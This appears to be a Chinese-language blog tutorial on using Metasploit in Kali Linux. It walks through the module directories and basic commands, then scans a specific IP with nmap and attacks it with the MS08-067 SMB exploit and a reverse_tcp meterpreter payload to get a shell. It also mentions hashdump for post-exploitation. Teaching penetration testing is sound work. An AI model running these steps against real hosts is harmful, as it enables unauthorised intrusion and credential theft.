kali漏洞利用之Metasploit實戰
Metasploit在滲透測試中經常被用到,實際上這套軟體包括了很多工具,這些工具組成了一個完整的攻擊框架。他們或許在滲透測試中的每一方面都不能稱為最好用的工具,但組合起來的框架卻讓它變得強大。
1.啟動服務:
在kali中使用metasploit,需要先開啟PostgreSQL資料庫服務和metasploit服務,然後就可以完整的利用msf資料庫查詢exploit和記錄
2.路徑介紹
kali中,msf的路徑為/usr/share/metasploit-framework
比如modules中,是我們在msf中經常會利用到的一些工具
auxiliary:輔助模組
encoders:供msfencode編碼工具使用,具體可使用msfencode -l
exploits:攻擊模組,每個介紹msf的文章都會提到那個ms08_067_netapi,它就在這個目錄。
payloads:這裡面列出的是攻擊載荷,也就是攻擊成功後執行的程式碼。比如我們常設定的windows/meterpreter/reverse_tcp就在這個資料夾下。
post:後滲透階段模組,在獲得meterpreter的shell之後可以使用的攻擊程式碼。比如常用的hashdump,arp_scanner就在這裡。
3.基本命令
msfpayload:用來生成payload或者shellcode
搜尋的時候可以用msfpayload -l |grep “windows”這樣的命令查詢。
-o 選項可以列出payload所需的引數
msfencode:
msf中的編碼器,現在常用msfpayload與它編碼避免exploit的壞字串(比如00,會起到隔斷作用)
msfconsole:
開啟metasploit的console
4.測試示例:發現漏洞,搜尋exploit,先用nmap掃描主機,掃描命令
nmap -sS -sV -O --script=smb-check-vulns.nse -n 222.28.136.22
可以看到,其中含有漏洞MS08-067
在console中搜索一下,可以看到下面的介面
然後就use其中一個版本
use exploit/windows/smb/ms08_067_netapi
檢視一些引數
可以看到RHOST(遠端IP地址)還沒有設定,這時我們就使用下面的命令來設定
set RHOST 222.28.136.22
選擇payload
設定好之後,就可以對目標進行攻擊測試,輸入exploit即可,如果成功,就會返回一個shell